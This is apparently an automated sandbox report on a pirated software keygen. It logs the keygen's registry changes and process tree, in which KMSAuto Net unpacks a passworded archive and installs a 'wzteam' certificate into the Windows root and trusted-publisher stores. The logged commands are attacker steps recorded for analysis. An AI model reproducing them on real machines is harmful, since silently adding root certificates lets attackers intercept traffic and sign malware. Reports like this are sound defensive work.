Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Processes:
certmgr.execertmgr.exeaskinstall20.execertmgr.execertmgr.exeSetup.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 6792 regedit.exe 7352 regedit.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 8 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 4664 PING.EXE 4940 PING.EXE 1340 PING.EXE 5872 PING.EXE 8088 PING.EXE 6488 PING.EXE 4088 PING.EXE 4440 PING.EXE -
Script User-Agent 19 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 298 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 643 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 648 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 893 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 165 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 176 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 340 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 353 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 357 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 390 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 185 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 596 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 934 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 945 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 187 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 303 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 601 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 696 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 739 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
KMSAuto Net.exeSppExtComObjPatcher.exe1615303685562.exe1615303690109.exefile.exemultitimer.exe1615303696450.exemultitimer.exepid process 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 812 KMSAuto Net.exe 2780 SppExtComObjPatcher.exe 2780 SppExtComObjPatcher.exe 2780 SppExtComObjPatcher.exe 2780 SppExtComObjPatcher.exe 2780 SppExtComObjPatcher.exe 2780 SppExtComObjPatcher.exe 4404 1615303685562.exe 4404 1615303685562.exe 4604 1615303690109.exe 4604 1615303690109.exe 4592 file.exe 4592 file.exe 4304 multitimer.exe 4304 multitimer.exe 4780 1615303696450.exe 4780 1615303696450.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4304 multitimer.exe 4768 multitimer.exe 4768 multitimer.exe 4768 multitimer.exe -
Suspicious behavior: LoadsDriver 7 IoCs
Processes:
pid process 612 612 612 612 612 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AUDIODG.EXENETSTAT.EXEKMSAuto Net.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeNETSTAT.EXEtaskkill.exetaskkill.exemsiexec.exemsiexec.exedescription pid process Token: 33 1972 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1972 AUDIODG.EXE Token: SeDebugPrivilege 688 NETSTAT.EXE Token: SeDebugPrivilege 812 KMSAuto Net.exe Token: SeDebugPrivilege 3512 taskkill.exe Token: SeDebugPrivilege 4024 taskkill.exe Token: SeDebugPrivilege 1836 taskkill.exe Token: SeDebugPrivilege 4032 taskkill.exe Token: SeDebugPrivilege 2192 taskkill.exe Token: SeDebugPrivilege 3560 taskkill.exe Token: SeDebugPrivilege 3372 taskkill.exe Token: SeDebugPrivilege 2200 taskkill.exe Token: SeDebugPrivilege 2784 taskkill.exe Token: SeDebugPrivilege 3132 taskkill.exe Token: SeDebugPrivilege 576 taskkill.exe Token: SeDebugPrivilege 1216 NETSTAT.EXE Token: SeDebugPrivilege 3728 taskkill.exe Token: SeDebugPrivilege 4020 taskkill.exe Token: SeShutdownPrivilege 4420 msiexec.exe Token: SeIncreaseQuotaPrivilege 4420 msiexec.exe Token: SeSecurityPrivilege 4488 msiexec.exe Token: SeCreateTokenPrivilege 4420 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4420 msiexec.exe Token: SeLockMemoryPrivilege 4420 msiexec.exe Token: SeIncreaseQuotaPrivilege 4420 msiexec.exe Token: SeMachineAccountPrivilege 4420 msiexec.exe Token: SeTcbPrivilege 4420 msiexec.exe Token: SeSecurityPrivilege 4420 msiexec.exe Token: SeTakeOwnershipPrivilege 4420 msiexec.exe Token: SeLoadDriverPrivilege 4420 msiexec.exe Token: SeSystemProfilePrivilege 4420 msiexec.exe Token: SeSystemtimePrivilege 4420 msiexec.exe Token: SeProfSingleProcessPrivilege 4420 msiexec.exe Token: SeIncBasePriorityPrivilege 4420 msiexec.exe Token: SeCreatePagefilePrivilege 4420 msiexec.exe Token: SeCreatePermanentPrivilege 4420 msiexec.exe Token: SeBackupPrivilege 4420 msiexec.exe Token: SeRestorePrivilege 4420 msiexec.exe Token: SeShutdownPrivilege 4420 msiexec.exe Token: SeDebugPrivilege 4420 msiexec.exe Token: SeAuditPrivilege 4420 msiexec.exe Token: SeSystemEnvironmentPrivilege 4420 msiexec.exe Token: SeChangeNotifyPrivilege 4420 msiexec.exe Token: SeRemoteShutdownPrivilege 4420 msiexec.exe Token: SeUndockPrivilege 4420 msiexec.exe Token: SeSyncAgentPrivilege 4420 msiexec.exe Token: SeEnableDelegationPrivilege 4420 msiexec.exe Token: SeManageVolumePrivilege 4420 msiexec.exe Token: SeImpersonatePrivilege 4420 msiexec.exe Token: SeCreateGlobalPrivilege 4420 msiexec.exe Token: SeCreateTokenPrivilege 4420 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4420 msiexec.exe Token: SeLockMemoryPrivilege 4420 msiexec.exe Token: SeIncreaseQuotaPrivilege 4420 msiexec.exe Token: SeMachineAccountPrivilege 4420 msiexec.exe Token: SeTcbPrivilege 4420 msiexec.exe Token: SeSecurityPrivilege 4420 msiexec.exe Token: SeTakeOwnershipPrivilege 4420 msiexec.exe Token: SeLoadDriverPrivilege 4420 msiexec.exe Token: SeSystemProfilePrivilege 4420 msiexec.exe Token: SeSystemtimePrivilege 4420 msiexec.exe Token: SeProfSingleProcessPrivilege 4420 msiexec.exe Token: SeIncBasePriorityPrivilege 4420 msiexec.exe Token: SeCreatePagefilePrivilege 4420 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
msiexec.exepid process 4420 msiexec.exe -
Suspicious use of SetWindowsHookEx 25 IoCs
Processes:
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datwzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datSppPatcher_x64.datpid process 628 Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe 628 Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe 3588 wzt.dat 3300 certmgr.exe 2132 certmgr.exe 3912 bin.dat 2804 AESDecoder.exe 2976 bin_x64.dat 1356 bin_x64.dat 212 bin_x64.dat 2064 bin_x64.dat 688 bin_x64.dat 1608 bin_x64.dat 488 bin_x64.dat 2524 bin_x64.dat 880 bin_x64.dat 2252 bin_x64.dat 3468 bin_x64.dat 3160 wzt.dat 3176 certmgr.exe 3884 certmgr.exe 2028 bin.dat 904 AESDecoder.exe 1444 bin_x64.dat 2184 SppPatcher_x64.dat -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
KMSAuto Net.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 812 wrote to memory of 3932 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3932 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3932 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 2064 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 2064 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3460 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3460 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 204 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 204 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 740 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 740 812 KMSAuto Net.exe cmd.exe PID 740 wrote to memory of 3588 740 cmd.exe wzt.dat PID 740 wrote to memory of 3588 740 cmd.exe wzt.dat PID 740 wrote to memory of 3588 740 cmd.exe wzt.dat PID 812 wrote to memory of 3000 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3000 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1412 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1412 812 KMSAuto Net.exe cmd.exe PID 1412 wrote to memory of 3300 1412 cmd.exe certmgr.exe PID 1412 wrote to memory of 3300 1412 cmd.exe certmgr.exe PID 1412 wrote to memory of 3300 1412 cmd.exe certmgr.exe PID 812 wrote to memory of 4016 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 4016 812 KMSAuto Net.exe cmd.exe PID 4016 wrote to memory of 2132 4016 cmd.exe certmgr.exe PID 4016 wrote to memory of 2132 4016 cmd.exe certmgr.exe PID 4016 wrote to memory of 2132 4016 cmd.exe certmgr.exe PID 812 wrote to memory of 748 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 748 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1152 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1152 812 KMSAuto Net.exe cmd.exe PID 1152 wrote to memory of 3912 1152 cmd.exe bin.dat PID 1152 wrote to memory of 3912 1152 cmd.exe bin.dat PID 1152 wrote to memory of 3912 1152 cmd.exe bin.dat PID 812 wrote to memory of 2084 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 2084 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3132 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3132 812 KMSAuto Net.exe cmd.exe PID 3132 wrote to memory of 2804 3132 cmd.exe AESDecoder.exe PID 3132 wrote to memory of 2804 3132 cmd.exe AESDecoder.exe PID 3132 wrote to memory of 2804 3132 cmd.exe AESDecoder.exe PID 812 wrote to memory of 3728 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 3728 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1532 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1532 812 KMSAuto Net.exe cmd.exe PID 1532 wrote to memory of 2976 1532 cmd.exe bin_x64.dat PID 1532 wrote to memory of 2976 1532 cmd.exe bin_x64.dat PID 1532 wrote to memory of 2976 1532 cmd.exe bin_x64.dat PID 812 wrote to memory of 4024 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 4024 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1836 812 KMSAuto Net.exe cmd.exe PID 812 wrote to memory of 1836 812 KMSAuto Net.exe cmd.exe PID 1836 wrote to memory of 4016 1836 cmd.exe cmd.exe PID 1836 wrote to memory of 4016 1836 cmd.exe cmd.exe PID 4016 wrote to memory of 688 4016 cmd.exe NETSTAT.EXE PID 4016 wrote to memory of 688 4016 cmd.exe NETSTAT.EXE PID 4016 wrote to memory of 1480 4016 cmd.exe find.exe PID 4016 wrote to memory of 1480 4016 cmd.exe find.exe PID 812 wrote to memory of 3984 812 KMSAuto Net.exe Netsh.exe PID 812 wrote to memory of 3984 812 KMSAuto Net.exe Netsh.exe PID 812 wrote to memory of 488 812 KMSAuto Net.exe Netsh.exe PID 812 wrote to memory of 488 812 KMSAuto Net.exe Netsh.exe PID 812 wrote to memory of 200 812 KMSAuto Net.exe sc.exe PID 812 wrote to memory of 200 812 KMSAuto Net.exe sc.exe PID 812 wrote to memory of 200 812 KMSAuto Net.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\KMSAuto Net.exe"C:\Users\Admin\Desktop\KMSAuto Net.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c md "C:\Users\Admin\AppData\Local\MSfree Inc"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /c echo test>>"C:\Users\Admin\Desktop\test.test"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\wzt.datwzt.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER2⤵
- Suspicious use of WriteProcessMemory
-
